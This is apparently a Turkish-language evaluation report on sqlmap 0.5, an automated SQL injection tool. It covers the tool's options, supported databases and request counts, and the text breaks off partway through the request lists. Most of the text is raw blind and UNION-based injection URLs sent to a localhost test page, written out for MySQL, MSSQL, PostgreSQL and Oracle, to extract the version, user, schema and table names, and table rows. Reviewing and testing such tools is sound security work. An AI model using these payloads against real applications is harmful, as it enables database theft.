Araç Bilgi

Lisans

 

    GPL v2

 

Versiyon

 

    0.5

 

Yazar & Bağlantı Bilgileri

 

    Bernardo Damele (Proje Lideri), bernardo.damele at gmail dot com ve

    Daniele Bellucci, daniele.bellucci at gmail dot com

 

Programlama Dili

 

    Python

 

Önkoşullar

 

    -

     

URL

 

    http://sqlmap.sourceforge.net/#download

 

Test Yatağı

 

    win2k3 sp1 vmware image with Python 2.5

    MSSQL 2005 EE, Oracle 10g EE, DB2 EC v 9.5, PostGreSQL 8.2, MySQL Community 5.0.45

     

Kurulum Püf Noktaları (Hatalar/Çözümler/Öneriler)

 

    1 hata düzeltme, detaylar için Sqlmap v.0.5 - HÇÖ  

Rapor Hakkında

Rapor İsmi

 

      Sqlmap - Otomatize  SQL Enjektörü Analizi

 

Rapor Yazarı

 

     Bedirhan Urgun, urgunb at hotmail dot com

 

Rapor Tarihi

 

     28 Şubat 2008

Kullanım

Komut Satırı/Grafiksel Arayüz

 

    Komut Satırı

 

Başlat/Durdur/Devam Et Özellikleri

    

    Saldırı süreci öldürülebilir (kill) ama kayıt opsiyonu kullanılmış ise (-o opsiyonu), saldırıya daha sonra tekrar durdurulduğu yerden başlanılabilir (-r opsiyonu).

 

Örnek:

[09:39:01] [INFO] query: DATABASE()
[09:39:01] [INFO] retrieved the length of query output: 6
[09:39:03] [INFO] resumed from file 'sqlmap.log': s...
[09:39:03] [INFO] retrieving pending 5 query output characters
[09:39:03] [INFO] retrieved: akila
current database:    'sakila'

 

Dokümantasyon

 

    "doc" dizini altında çok faydalı bir README.html dosyası

DB Döküm Yetenekleri

Hafifsıklet Bilgiler

     

     DBMS başlığı (banner), kullanıcı (current user), veritabanı (current db), veritabanı kullanıcıları, veritabanı kullanıcı şifre özetleri (diğer bilgiler -e "[sorgu_buraya]"  opsiyonu ile alınabilir)

 

Veritabanı İsimleri

 

     --dbs opsiyonu ile

 

Tablo İsimleri 

 

     --tables opsiyonu ile

 

Sutün İsimleri

 

     --columns opsiyonu ile

 

Tablo Satırları

 

     --dump opsiyonu ile

Performans

Temel Sorgu

 

     sqlmap.py -u http://localhost/sqlinj.php --method POST --data "name=PENELOPE&blind=false&order=1&database=mysql" --banner

 

     DBMS banner dökümü

 

Püf Noktaları

 

    Daha az istek kullanmak için (hem kör hem union sql enjeksiyonu tipleri için )

 

--remote-dbms=DBMS  (ex: --remote-dbms="mysql 5")
-p PARAMNAME  (ex: -p name)
--exclude-sysdbs

    

 

opsiyonları kullanılabilir. 

 

Çalıştırılan Toplam Sorgu Sayısı

 

    DBMS Banner Almak

 

        Kör

 

Mysql: 151

Mssql: 1331

Postgresql: 630

Oracle: 465

 

        Union

 

Mysql: 17

Mssql: 18

Postgresql: 18 

Oracle: 18 

             

    Kullanıcı İsmi Almak

 

        Kör

 

Mysql: 31

Mssql: 78

Postgresql: 70

Oracle: 74

 

        Union

 

Mysql: 18

Mssql: 17

Postgresql: 18

Oracle: 18

Özellikler         

Kimlik Doğrulama Tipleri

 

    Cookie

 

        --cookie opsiyonu ile

 

    Temel Kimlik Doğrulama

 

        --basic-auth opsiyonu ile

 

    Özet Kimlik Doğrulama

 

         --digest-auth opsiyonu ile

 

    NTLM

 

         -

 

    Sertifika

 

         -

 

DBMS Desteği

 

     Bu raporda kalın veritabanı isimleri başarılı olarak denenmiştir.

     

    MSSQL 

    MYSQL

    POSTGRESQL

    ORACLE    

     

Gerçeklenen Enjeksiyon Tipleri

 

 

    Kör

 

        Doğru/Yanlış

 

             Evet

 

        Zaman Tabanlı

 

             -

 

    Hata Tabanlı

 

        -

    

   Union     

 

       Evet. --use-union opsiyonu ile

 

    Tek Kayıt Union

 

        Evet

 

    Bant Dışı Kanal

 

        -

     

Anonimlik Desteği

 

   User-Agent

 

       --user-agent opsiyonu ile

 

   Referrer

 

        -

 

   Proxy

 

       --proxy opsiyonu ile

 

Veritabanı Döküm Granüleritesi

 

     veritabanları, tablolar, sütunlar, satırlar

 

Diğer

 

     302 Yönlendirme Yönetimi

 

         -

 

     Atlatma (Evasion) Özellikleri

 

         string kodlama (ASCII->Char) 

 

     Özel Yapım SQL Sorgu Desteği

 

         -e opsiyonu ile

 

     Paralel İstekler

 

         -.Ama kullanılan algoritma paralelliği desteklemektedir.

     

Enjeksiyon Noktaları

 

    GET

         

        Yes

 

    POST

 

        Yes

 

    COOKIE

 

        Yes

 

    HTTP HEADERS

     

        -

 

Otomatik Yazılım Yenileme

 

     SVN

Çıktı/Kayıt Tutma

İstek/Cevap Kayıtları

         

  -v hata ayıklama yolu opsiyonu ile

 

Programa Özel Kayıt Tutma

 

     -o opsiyonu ile

SQLi Açıklık Tarama Desteği

Basit SQL Enjeksiyonu Testi (Tek URL ve Parametreler)

 

   Yes

 

Basit SQL Enjeksiyonu Tarama (Crawling Yolu İle)

 

    -

  Sorgu Detayları

    Kör

 

    DBMS Banner Alma

 

        Mysql         

...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((VERSION()), 7, 1)) > 31 AND '1'='1&database=&type=&order=&log=1

...

 

        Mssql 

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((@@VERSION), 3, 1)) > 63 AND '1'='1&database=mssql&type=0&order=1&log=1

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((VERSION()), 2, 1)) > 111 AND '1'='1&database=pgsql&type=0&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT banner FROM v$version WHERE ROWNUM=1), 2, 1)) > 119 AND '1'='1&database=oracle&type=0&order=1&log=1 

... 

 Kullanıcı İsmi Alma

 

         Mysql

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((CURRENT_USER()), 3, 1)) > 105 AND '1'='1&database=mysql&type=0&order=1&log=1

...

 

        Mssql 

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SYSTEM_USER), 1, 1)) > 107 AND '1'='1&database=mssql&type=0&order=1&log=1

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((CURRENT_USER), 2, 1)) > 63 AND '1'='1&database=pgsql&type=0&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT SYS.LOGIN_USER FROM DUAL), 1, 1)) > 75 AND '1'='1&database=oracle&type=0&order=1&log=1 

...

 

    Veritabanı İsimlerini Alma

 

         Mysql

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT schema_name FROM information_schema.SCHEMATA LIMIT 0, 1), 8, 1)) > 63 AND '1'='1&database=mysql&type=0&order=1&log=1

...

 

        Mssql 

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT LTRIM(STR(COUNT(name))) FROM master..sysdatabases), 2, 1)) > 7 AND '1'='1&database=mssql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT TOP 1 name FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases ORDER BY name) ORDER BY name), 5, 1)) > 111 AND '1'='1&database=mssql&type=0&order=1&log=1

...

        Postgresql

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables), 2, 1)) > 63 AND '1'='1&database=pgsql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT DISTINCT(schemaname) FROM pg_tables OFFSET 0 LIMIT 1), 2, 1)) > 107 AND '1'='1&database=pgsql&type=0&order=1&log=1

...

        Oracle 

 

             -,     "[WARNING] this plugin can not enumerate databases"

 

    Tablo İsimlerini Alma

 

         Mysql

 

...

 http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT COUNT(table_name) FROM information_schema.TABLES WHERE table_schema=CHAR(115,97,107,105,108,97)), 3, 1)) > 15 AND '1'='1&database=mysql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT table_name FROM information_schema.TABLES WHERE table_schema=CHAR(115,97,107,105,108,97) LIMIT 0, 1), 1, 1)) > 103 AND '1'='1&database=mysql&type=0&order=1&log=1
...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT LTRIM(STR(COUNT(table_name))) FROM Northwind.information_schema.tables WHERE table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69))), 3, 1)) > 31 AND '1'='1&database=mssql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT TOP 1 table_name FROM Northwind.information_schema.tables WHERE table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69)) AND table_name NOT IN (SELECT TOP 0 table_name FROM Northwind.information_schema.tables WHERE table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69)) ORDER BY table_name) ORDER BY table_name), 3, 1)) > 63 AND '1'='1&database=mssql&type=0&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(tablename) FROM pg_tables WHERE schemaname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))), 2, 1)) > 51 AND '1'='1&database=pgsql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT tablename FROM pg_tables WHERE schemaname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)) OFFSET 0 LIMIT 1), 2, 1)) > 63 AND '1'='1&database=pgsql&type=0&order=1&log=1

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))), 2, 1)) > 7 AND '1'='1&database=oracle&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS limit FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))) WHERE limit=1), 3, 1)) > 95 AND '1'='1&database=oracle&type=0&order=1&log=1

...

 

    Sutün İsimlerini Alma     

  

         Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT COUNT(column_name) FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97)), 1, 1)) > 52 AND '1'='1&database=mysql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT column_name FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97) LIMIT 0, 1), 1, 1)) > 99 AND '1'='1&database=mysql&type=0&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT LTRIM(STR(COUNT(column_name))) FROM Northwind.information_schema.columns, Northwind.information_schema.tables WHERE Northwind.information_schema.columns.table_name=(CHAR(97) CHAR(99) CHAR(116) CHAR(111) CHAR(114)) AND Northwind.information_schema.columns.table_name=Northwind.information_schema.tables.table_name AND Northwind.information_schema.tables.table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69))), 2, 1)) > 7 AND '1'='1&database=mssql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT TOP 1 column_name FROM Northwind.information_schema.columns, Northwind.information_schema.tables WHERE Northwind.information_schema.columns.table_name=(CHAR(97) CHAR(99) CHAR(116) CHAR(111) CHAR(114)) AND Northwind.information_schema.columns.table_name=Northwind.information_schema.tables.table_name AND Northwind.information_schema.tables.table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69)) AND column_name NOT IN (SELECT TOP 0 column_name FROM Northwind.information_schema.columns, Northwind.information_schema.tables WHERE Northwind.information_schema.columns.table_name=(CHAR(97) CHAR(99) CHAR(116) CHAR(111) CHAR(114)) AND Northwind.information_schema.columns.table_name=Northwind.information_schema.tables.table_name AND Northwind.information_schema.tables.table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69)) ORDER BY column_name) ORDER BY column_name), 1, 1)) > 95 AND '1'='1&database=mssql&type=0&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(attname) FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname=(CHR(97)||CHR(99)||CHR(116)||CHR(111)||CHR(114)) AND nspname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))), 2, 1)) > 15 AND '1'='1&database=pgsql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT attname FROM pg_namespace, pg_type, pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname=(CHR(97)||CHR(99)||CHR(116)||CHR(111)||CHR(114)) AND nspname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)) OFFSET 0 LIMIT 1), 3, 1)) > 116 AND '1'='1&database=pgsql&type=0&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(65)||CHR(67)||CHR(84)||CHR(79)||CHR(82))), 2, 1)) > 3 AND '1'='1&database=oracle&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME, ROWNUM AS limit FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(65)||CHR(67)||CHR(84)||CHR(79)||CHR(82))) WHERE limit=1), 3, 1)) > 63 AND '1'='1&database=oracle&type=0&order=1&log=1

...

 

     Satırları Alma     

 

         Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT COUNT(*) FROM sakila.actor), 3, 1)) > 55 AND '1'='1&database=mysql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ORD(MID((SELECT actor_id FROM sakila.actor ORDER BY actor_id LIMIT 3, 1), 2, 1)) > 63 AND '1'='1&database=mysql&type=0&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT LTRIM(STR(COUNT(*))) FROM Northwind..actor), 3, 1)) > 48 AND '1'='1&database=mssql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTRING((SELECT TOP 1 actor_id FROM Northwind..actor WHERE actor_id NOT IN (SELECT TOP 2 actor_id FROM Northwind..actor ORDER BY actor_id) ORDER BY actor_id), 1, 1)) > 1 AND '1'='1&database=mssql&type=0&order=1&log=1

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(*) FROM public.actor), 4, 1)) > 31 AND '1'='1&database=pgsql&type=0&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT actor_id FROM public.actor ORDER BY actor_id OFFSET 1 LIMIT 1), 1, 1)) > 50 AND '1'='1&database=pgsql&type=0&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT COUNT(*) FROM ACTOR), 4, 1)) > 7 AND '1'='1&database=oracle&type=0&order=1&log=1

...

http://localhost/sqlinj.php?name=PENELOPE' AND ASCII(SUBSTR((SELECT ACTOR_ID FROM (SELECT ACTOR_ID, ROWNUM AS limit FROM ACTOR ORDER BY ACTOR_ID) WHERE limit=2), 1, 1)) > 63 AND '1'='1&database=oracle&type=0&order=1&log=1 

...

    Union

 

    DBMS Banner Alma

 

        Mysql         

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), CHAR(49,55,55,48,51), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), VERSION(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) @@VERSION (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||VERSION()||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(banner AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM v$version WHERE ROWNUM=1-- ('1'='1&database=oracle&type=2&order=1&log=1 

... 

 

    Kullanıcı İsmi Alma

 

         Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), CURRENT_USER(), CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) SYSTEM_USER (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CURRENT_USER||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1     

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(SYS.LOGIN_USER AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1 

...

 

    Veritabanı İsimlerini Alma

 

         Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), schema_name, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.SCHEMATA-- ('1'='1&database=mysql&type=2&order=1&log=1

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) CAST(name AS varchar) (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL FROM master..sysdatabases-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(schemaname AS bpchar)||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM pg_tables-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

             -,     "[WARNING] this plugin can not enumerate databases"

 

    Tablo İsimlerini Alma

 

         Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), table_schema, CHAR(95,95,68,69,76,95,95), table_name, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.TABLES WHERE table_schema=CHAR(115,97,107,105,108,97)-- ('1'='1&database=mysql&type=2&order=1&log=1

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
..

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(65) CHAR(82) CHAR(84) CHAR(95) CHAR(95)) CAST(table_name AS varchar) (CHAR(95) CHAR(95) CHAR(83) CHAR(84) CHAR(79) CHAR(80) CHAR(95) CHAR(95)), NULL, NULL FROM Northwind.information_schema.tables WHERE table_type=(CHAR(66) CHAR(65) CHAR(83) CHAR(69) CHAR(32) CHAR(84) CHAR(65) CHAR(66) CHAR(76) CHAR(69))-- ('1'='1&database=mssql&type=2&order=1&log=1 

...

        Postgresql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=pgsql&type=2&order=1&log=1
...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(schemaname AS bpchar)||(CHR(95)||CHR(95)||CHR(68)||CHR(69)||CHR(76)||CHR(95)||CHR(95))|| CAST(tablename AS bpchar)||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM pg_tables WHERE schemaname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))-- ('1'='1&database=pgsql&type=2&order=1&log=1 

...

        Oracle 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL FROM DUAL-- ('1'='1&database=oracle&type=2&order=1&log=1
..

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, (CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(65)||CHR(82)||CHR(84)||CHR(95)||CHR(95))||CAST(TABLESPACE_NAME AS varchar(4000))||(CHR(95)||CHR(95)||CHR(68)||CHR(69)||CHR(76)||CHR(95)||CHR(95))|| CAST(TABLE_NAME AS varchar(4000))||(CHR(95)||CHR(95)||CHR(83)||CHR(84)||CHR(79)||CHR(80)||CHR(95)||CHR(95)), NULL, NULL FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- ('1'='1&database=oracle&type=2&order=1&log=1 

...

 

    Sutün İsimlerini Alma     

  

         Mysql

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL, NULL-- ('1'='1&database=mysql&type=2&order=1&log=1
http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT CONCAT(CHAR(95,95,83,84,65,82,84,95,95), column_name, CHAR(95,95,68,69,76,95,95), data_type, CHAR(95,95,83,84,79,80,95,95)), NULL, NULL, NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(97,99,116,111,114) AND table_schema=CHAR(115,97,107,105,108,97)-- ('1'='1&database=mysql&type=2&order=1&log=1 

...

 

        Mssql 

 

...

http://localhost/sqlinj.php?name=PENELOPE') UNION ALL SELECT NULL, NULL, NULL-- ('1'='1&database=mssql&type=2&order=1&log=1
